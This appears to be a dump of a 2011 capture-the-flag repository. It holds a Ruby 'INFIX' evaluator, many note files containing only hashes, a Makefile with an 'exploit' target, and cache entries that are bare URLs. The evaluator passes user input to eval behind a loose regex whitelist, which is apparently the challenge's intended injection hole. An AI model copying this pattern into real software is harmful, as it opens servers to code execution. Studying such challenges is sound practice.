--------------------------------------------------------------------------------
 1 | module INFIX
 2 | 	class Evaluator
 3 | 
 4 |     class String
 5 |         def tokenize(tokens) #for later use
 6 |             string=self.clone
 7 |             matches=[]
 8 |             while string.length!=0
 9 |                 tokenized = tokens.map do |name,regexp|
10 |                         if (string=~regexp)==0
11 |                             if $& then [name,$&,$'] else nil end 
12 |                         end 
13 |                     end 
14 |                 name,match,string =tokenized.compact.max_by{|x| x[1].length}
15 |                 return nil unless match
16 |                 matches<<[name,match]
17 |             end 
18 |             return matches
19 |         end 
20 |     end 
21 | 
22 | 		def run(string)
23 | 			string.strip!
24 | 			if string=~/^[+*\/%-()0-9]*$/ #whitelist math expressions
25 | 				return eval(string).to_s
26 | 			end
27 | 			return "not a math expression (you may not use anything but numbers and operators)"
28 | 		end
29 | 	end
30 | end
31 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/11dea2d28c:
--------------------------------------------------------------------------------
1 | 718ed0894c7020db9de4871bda32b277501831f0
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/12ef3a5636:
--------------------------------------------------------------------------------
1 | 6168d3f4bef100d35acab5ecbece60514a644109
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/1412de8110:
--------------------------------------------------------------------------------
1 | b865dae8e20ff7783d9841a9ac1b0b6a8fb77688
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/1761c27d39:
--------------------------------------------------------------------------------
1 | fb42f55a93ecad063449e56c9940ac0e466875a5
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/179819ef53:
--------------------------------------------------------------------------------
1 | 1e5b890c3bcafd8b9bec89cd0e68a5b3fb6f6b02
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/1af8dad932:
--------------------------------------------------------------------------------
1 | a5c6468cbe175a3dfecb835d799b3de349db153b
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/1b71463b38:
--------------------------------------------------------------------------------
1 | b390bb062011008511f015e69f023791d5a1fffc
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/1c7f7ea9e7:
--------------------------------------------------------------------------------
1 | d5074e9e21e1fb9d87bd4d8af7e3ccfc36871230
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/1c948d1fd5:
--------------------------------------------------------------------------------
1 | 1983dda9a05dde65409c754ba73cf7ce0fb6632b
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/1e6e675e7a:
--------------------------------------------------------------------------------
1 | 09bc49016f4907ea4312b5d64b74462628ab948c
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/2118d5526e:
--------------------------------------------------------------------------------
1 | bb6dcc9a32c71466cd96819921b8549efe99ee84
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/21e50c75c:
--------------------------------------------------------------------------------
1 | 9e0b1eac853e9721e3d85b318ccb3b49139fa44f
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/2844fa13c1:
--------------------------------------------------------------------------------
1 | 501331a56ae2b316315212136095233e3b254376
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/28dedeaeb7:
--------------------------------------------------------------------------------
1 | fa16aa1800f1e535ac9583e793defcb4f9439fd5
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/2e38714cc5:
--------------------------------------------------------------------------------
1 | 5038c66fd270b6d72489d7a568a98b2bdf392e74
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/2e7af9f22e:
--------------------------------------------------------------------------------
1 | eeccfd7ecdde8385ac1d581b7abb4fe959e510df
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/384e4a29cf:
--------------------------------------------------------------------------------
1 | c742d67c490350fc79f8a951b436c7cb42e5cc30
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/39c2389b2a:
--------------------------------------------------------------------------------
1 | 5b0b2e312e65367a83f583afe29e5be2607f88d0
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/39fd523490:
--------------------------------------------------------------------------------
1 | 40b1000c3c64c316961ac4ec46a6742f313b7fbf
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/3a035dca7:
--------------------------------------------------------------------------------
1 | 4432070c3301bfe2dd8c2d9c31ce9d809830420f
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/3e3a14a381:
--------------------------------------------------------------------------------
1 | bc05079df508e659fe97c033e0706c9a1d35c7cc
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/3f4957fd75:
--------------------------------------------------------------------------------
1 | 32d785d5f3c038710a11fe85f34e27ad3c5ae5e7
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/3fdfeb9959:
--------------------------------------------------------------------------------
1 | 0a42a6966a80d5f0875b05a4c517ec92db39f52b
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/4023d17a27:
--------------------------------------------------------------------------------
1 | 115fa69a0cdbab1d040cb4bc7b2aafc4d0910825
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/40865b5e95:
--------------------------------------------------------------------------------
1 | fd7bebc3af97c0dc9baf983489cfd7712c5207ae
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/40bd868b78:
--------------------------------------------------------------------------------
1 | f9bcf079a2aac7de7ef8a869e9cf74a2e8c9c504
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/40e3b4ce58:
--------------------------------------------------------------------------------
1 | ce690f5ed1cdcb80b70ca753fb23cc5670b7071a
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/447fdf5101:
--------------------------------------------------------------------------------
1 | a20341d4ac0f5029e1a67622b0243ff996b0a479
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/454a9bd038:
--------------------------------------------------------------------------------
1 | d8c897cb64791b383b9a91ebe9d271f24d8e19af
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/4725520052:
--------------------------------------------------------------------------------
1 | 014974a890f09bdfbcead8eaf119de8a297cc9d3
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/47f12f9362:
--------------------------------------------------------------------------------
1 | 81f3bf53062df0fcb9f80d148cd85c9d38b8d091
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/48ac2956ac:
--------------------------------------------------------------------------------
1 | fde837844f69c58c8556457902ff48a992ecab9f
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/49cfdb8410:
--------------------------------------------------------------------------------
1 | ec7db5ede7ab6139cf1d48764bb7e10bcda4eb5f
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/4d63feb72a:
--------------------------------------------------------------------------------
1 | 527e878740a3f6dd0b577d1920b4f6a838bad0a1
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/4dd83eec01:
--------------------------------------------------------------------------------
1 | c88e8572f8e5b5a5a73ad8bc1d06330200bddc5a
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/50ca0c11a9:
--------------------------------------------------------------------------------
1 | 6bcc93c343e49d5ebce0ba2b757b7063c8f425a2
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/55065434d6:
--------------------------------------------------------------------------------
1 | 4361bf3620742dfda677965e5d1fae212004b1ac
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/5604a2d25a:
--------------------------------------------------------------------------------
1 | b9c0982a00ffdd34db6f42f6dadbc1b7ce172dc2
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/5778f52028:
--------------------------------------------------------------------------------
1 | b6656aaa02fe93b61b7fab4b6a58e869e1fa5772
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/59c66e91f3:
--------------------------------------------------------------------------------
1 | 4fa1d501a8b2007533ad4040e7d6af9e8f836e07
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/5a7807044:
--------------------------------------------------------------------------------
1 | 550459dda4af98cc56229f60f07503be2eff8a9b
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/5e7f24f36:
--------------------------------------------------------------------------------
1 | 4aba053a8f06ce12609147a945a0614e5ba58ad3
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/5ef3004dca:
--------------------------------------------------------------------------------
1 | be104e63eeaec5d8377352d3395adb05c73d6a99
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/62cddabc8:
--------------------------------------------------------------------------------
1 | 7504d572b579c97e0f13f6da8d03d41731981409
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/65ff1abd5c:
--------------------------------------------------------------------------------
1 | da1a02f0f8c00c30a8e088631e89a4b6ec6e6ebe
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/6600c732c5:
--------------------------------------------------------------------------------
1 | 876cbaa722fec380d176dfe5dbf21bef01cf7863
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/6628c4cda0:
--------------------------------------------------------------------------------
1 | af7c3560dec3186af60a55c5bd11ddb64e86d7ec
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/67b22cd7b3:
--------------------------------------------------------------------------------
1 | 948151ad22717bcb47cfcc48ca7d4088c1a57b29
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/6862f089c9:
--------------------------------------------------------------------------------
1 | 51dc4d289e37be9f237b4ebd3ce06eddffc2f0a7
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/6b2ceaade8:
--------------------------------------------------------------------------------
1 | ed74c32282581fe17b978c785b7d8064c61b5e28
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/6bb3882be2:
--------------------------------------------------------------------------------
1 | 9705c4d104d59752d64e3f8ef2b1aba126af5c36
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/7211779d30:
--------------------------------------------------------------------------------
1 | 8916b1f1439e7d3e12f7a43f905f03bb4b0ec462
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/762317c0f6:
--------------------------------------------------------------------------------
1 | 3207fc6353fa9a0e81169056acf911135d1fbe8e
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/7637abbcd3:
--------------------------------------------------------------------------------
1 | 52c5bdc92c41fb8fd48674a992cec26820ff7dcb
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/7726e5be34:
--------------------------------------------------------------------------------
1 | 7bcfcd7b9416b6bcf1e447c319fef47262105ebf
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/77633045cf:
--------------------------------------------------------------------------------
1 | 622416d6e115dc8fe19920c648c7514d6635a160
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/7eafd84f9b:
--------------------------------------------------------------------------------
1 | 8cd4b532c19797b5eed3b567c5178b07116ab40e
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/802cda5e79:
--------------------------------------------------------------------------------
1 | ee45d0339437e049d57ce99304a2f34c70cbeca9
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/80345cc2ba:
--------------------------------------------------------------------------------
1 | e6086835d69a61e22b416f722fa7cf9562919dd7
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/83e7bd2507:
--------------------------------------------------------------------------------
1 | b85a9323a69c3b9ef7901a00cf2db8256b4a7bc8
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/85e236c1ca:
--------------------------------------------------------------------------------
1 | 929b34d2536de20ca05d305dce4cbb185213415a
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/85e7e70c03:
--------------------------------------------------------------------------------
1 | e6d51e84503a3b09edd2a76f2438c3b947049964
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/869d75bff6:
--------------------------------------------------------------------------------
1 | 57c8908de258bf532949ec6e3cf1d83b8e76ec57
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/87154a9942:
--------------------------------------------------------------------------------
1 | 74a4a737418672640c56731f45ae5c92b4c8f746
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/87c124e4f0:
--------------------------------------------------------------------------------
1 | d0bfd85dc69a70e153f3a31dd1ac6f09b9c10a4b
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/889cc7362e:
--------------------------------------------------------------------------------
1 | 113667f25b45ddf18c46194181afc17ef8a3cbb6
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/894acc680a:
--------------------------------------------------------------------------------
1 | 8b2e77475b5c529814384509b9386c59e2dcd34d
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/8bc6ece8e6:
--------------------------------------------------------------------------------
1 | 8e86c4d3aa4fdfa72807a98dd11ff700e0916ed5
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/8bd0f79c98:
--------------------------------------------------------------------------------
1 | 2ee0b219e13d3584c228e17c288c5bf919cc694f
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/8c3d285f7c:
--------------------------------------------------------------------------------
1 | b1e6ea2db1200728eb5114c99e2c276d374de7a3
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/8c63b4f51:
--------------------------------------------------------------------------------
1 | b95e04251b81dc7eb94f953972fd36183857e657
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/8d7a8a899d:
--------------------------------------------------------------------------------
1 | a0192a058ea067b3b2961fa609f77895ee33f609
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/8e909bdc53:
--------------------------------------------------------------------------------
1 | 0f00ced551a5eb0d51e08e1684c1f0a74a06f725
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/90f5656b0f:
--------------------------------------------------------------------------------
1 | 612491dceb743a7790b784e28cb7ae3168f9a228
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/910da102e4:
--------------------------------------------------------------------------------
1 | c33145091b45cc59796c975e7bf90a40ea756d4b
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/933f184550:
--------------------------------------------------------------------------------
1 | ac0b1640523ff9cb3898c73667fc65f9e46869fd
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/950d83d8b4:
--------------------------------------------------------------------------------
1 | 98248975c0409e9eb842791ca1ce189da93d6925
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/954bda793a:
--------------------------------------------------------------------------------
1 | 8413f465f70e151d0d3df8d4e3510e923e07b4db
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/97fe95b443:
--------------------------------------------------------------------------------
1 | e3f4bbadb5613ca0a5b446e3c95fee530d718351
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/988df52a5e:
--------------------------------------------------------------------------------
1 | c29725dd1f4ce3c2a3edfdf311a066abe35c1a65
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/9a1ab6a5f5:
--------------------------------------------------------------------------------
1 | 46cbe2159de81f2ac3f2bad0f3fbc6f20fbcf266
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/9ccb135565:
--------------------------------------------------------------------------------
1 | 4a65c167d1410e77d07b84ab6eb44a7af67640dc
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/9dfce2c04:
--------------------------------------------------------------------------------
1 | 1a1f532df947a1c16070914c3cdd8cf4424c9e50
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/a0a953e7d1:
--------------------------------------------------------------------------------
1 | b967dab90d442fe5534a246b4f06229d3fa3abb5
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/a3ef139b73:
--------------------------------------------------------------------------------
1 | f4a310f15a0b28a4851c79e5264a25fdcd6f31aa
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/a5a0a484b6:
--------------------------------------------------------------------------------
1 | a8773abf9fbbe1f85229f3a7c746aa7cc4e0ac4b
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/a66fa565c1:
--------------------------------------------------------------------------------
1 | 38dce20eb23f0caccc86c90143d759c11e5d769e
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/aab677d2c3:
--------------------------------------------------------------------------------
1 | b31fea72aefa6bd61eb9de4233f3bd1b42bc3617
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/ac4dda1f13:
--------------------------------------------------------------------------------
1 | 659c46af4b955844fb2c13f24fc48f8c1440a30b
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/ae4e923ac9:
--------------------------------------------------------------------------------
1 | 067397ce2e4bda2868e4ad7ed39d5eea3be683d9
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/aff209f686:
--------------------------------------------------------------------------------
1 | 72f38c14e78c3eb26a9764af63f8f407521406c1
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/b17f0dee94:
--------------------------------------------------------------------------------
1 | 6c79d211ce103c648d49282289fca123b2bd1ffa
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/b1acc539cc:
--------------------------------------------------------------------------------
1 | 2736bfdd95f5ffc0ac7f3948e2281b61686efa4e
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/b1fdd932a6:
--------------------------------------------------------------------------------
1 | 286e3923c5ca83abedbce730f922d60d71d17f50
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/b33b437859:
--------------------------------------------------------------------------------
1 | bc53324d2d25c7a64c1f9c4e0999243ed68f1ef1
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/b3e178f5db:
--------------------------------------------------------------------------------
1 | 5b893a2a13d5f9208d9aefd5db5e9b5a0763bd6f
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/b51dd3af91:
--------------------------------------------------------------------------------
1 | c81a60cad699125188e876b7ca6a6e290ba45b58
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/b5eeb84654:
--------------------------------------------------------------------------------
1 | e79753467ec20cc38da6a05aa1936f5f98b42192
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/b7f51bf578:
--------------------------------------------------------------------------------
1 | 82cdaa11ca905153ec2345cae5ef37c1bc7b3cba
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/b968c6823c:
--------------------------------------------------------------------------------
1 | 50f067d4a75e2a293d6665aed97f9df498ea22a1
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/bac3662565:
--------------------------------------------------------------------------------
1 | 27828278d1be8a8b3345f485b17b42ad81256621
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/bcab827652:
--------------------------------------------------------------------------------
1 | a319dd391b5d051b04aac0633d8e86557b875d71
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/c03a48669d:
--------------------------------------------------------------------------------
1 | 3b700225bdb71dac3830398a6e6ab564ec28d7b9
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/ca0f596087:
--------------------------------------------------------------------------------
1 | de004da6f6e568611997dd92522e14e27c8c22b2
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/cd4563d69b:
--------------------------------------------------------------------------------
1 | a4cccf4f34b1157dd87f3a7145c38ed8260c80b0
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/cd8d45f708:
--------------------------------------------------------------------------------
1 | 35284d63881a2b52c51819e60320d246e4e667b4
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/ceeddf887c:
--------------------------------------------------------------------------------
1 | 80ef644ebfd1f640e9306f4cd451a1485dcca911
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/d2d474a540:
--------------------------------------------------------------------------------
1 | fd0f338d94daac692f38d2b322369c54acbb70f2
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/db678ea49c:
--------------------------------------------------------------------------------
1 | e40e25dd62d007d520bcdea891ff16756ed6629c
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/e23403eafb:
--------------------------------------------------------------------------------
1 | d8f4414f9bf2e0610b1ef7440961c89813ad559a
2 | 


--------------------------------------------------------------------------------
/2011.rwth/office/notes/e4c918f4ed:
--------------------------------------------------------------------------------
1 | 22fc8dec38d8a5cda5cd242b882a6900835568ae
2 | 


--------------------------------------------------------------------------------
/2011.rwth/ps3game/Makefile:
--------------------------------------------------------------------------------
1 | ps3gamedbg: ps3game.c
2 | 	gcc -g -O2 -m32 -std=gnu99 -o $@ $<
3 | 
4 | exploit: exploit.c import.c
5 | 	gcc -m32 -std=gnu99 -o $@ $< import.c
6 | 
7 | clean:
8 | 	rm -f ps3game
9 | 


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/-NYlRf0Vm3gUoAd-GzdMgw--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/-NYlRf0Vm3gUoAd-GzdMgw--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/-byV6I5VAZqesnqotKzFLA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/-byV6I5VAZqesnqotKzFLA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/-hzM5Ei6EI+04Y9+q+I-Ag--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/-hzM5Ei6EI+04Y9+q+I-Ag--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/08Y2xZh-lxVZ5HA0-I2Pug--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/08Y2xZh-lxVZ5HA0-I2Pug--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/0I6eHlb8u3IHIDH6BCwv9g--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/0I6eHlb8u3IHIDH6BCwv9g--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/0dqdDpZt7XeV-nhmvkSBGQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/0dqdDpZt7XeV-nhmvkSBGQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/18L1JiNWibJ7rDLm1YwJTg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/18L1JiNWibJ7rDLm1YwJTg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/2U4SQOO3iCcifBa9vqlUQQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/2U4SQOO3iCcifBa9vqlUQQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/2W7A0bqemVTlRAx0aG78VQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/2W7A0bqemVTlRAx0aG78VQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/2i5WPp3nSsdBdE3nfXr+6A--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/2i5WPp3nSsdBdE3nfXr+6A--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/3BMew-PHPeP0LUTPHHwm9A--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/3BMew-PHPeP0LUTPHHwm9A--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/3jlB85BFUru4QstRJ78ucA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/3jlB85BFUru4QstRJ78ucA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/3qwTLbUejhIkE-ATGxC7QA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/3qwTLbUejhIkE-ATGxC7QA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/5MJyHpJ4G10O1zNZBFcPFg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/5MJyHpJ4G10O1zNZBFcPFg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/5QSLHkPG2TKRCoBonacOng--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/5QSLHkPG2TKRCoBonacOng--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/6-9Vv8xYuQMR1K9IwOL6tA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/6-9Vv8xYuQMR1K9IwOL6tA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/6YO2Cf7DDAKxWLro19N3Gg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/6YO2Cf7DDAKxWLro19N3Gg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/7QTz4Nmfsvq3k4rwX0yDlQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/7QTz4Nmfsvq3k4rwX0yDlQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/8uGm0ZOpUd31XlGEfwTYZg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/8uGm0ZOpUd31XlGEfwTYZg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/9MbX2SbGyyZQ7EWBiNF-DQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/9MbX2SbGyyZQ7EWBiNF-DQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/9fenjsH2oEabd+d6WuuRFQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/9fenjsH2oEabd+d6WuuRFQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/A03QxoTt7LgYzXmy4BWyKw--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/A03QxoTt7LgYzXmy4BWyKw--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/ABq-Ia2TDG9UvrDICr5Npg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/ABq-Ia2TDG9UvrDICr5Npg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/Abvm1Ql0wrtD9Tos+p4JlA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/Abvm1Ql0wrtD9Tos+p4JlA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/B+Elvl2WN9j68AfQ0QSecg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/B+Elvl2WN9j68AfQ0QSecg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/B6lQZ0t4NV7YXx-MmD2l6w--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/B6lQZ0t4NV7YXx-MmD2l6w--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/BRAaC8p7gp4p2a98eiqlqg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/BRAaC8p7gp4p2a98eiqlqg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/DN8vE-wntvUp9eKmEEOs-w--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/DN8vE-wntvUp9eKmEEOs-w--


--------------------------------------------------------------------------------
